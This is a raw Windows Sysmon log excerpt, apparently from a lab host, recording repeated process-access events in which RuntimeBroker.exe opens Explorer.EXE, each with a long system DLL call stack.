13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 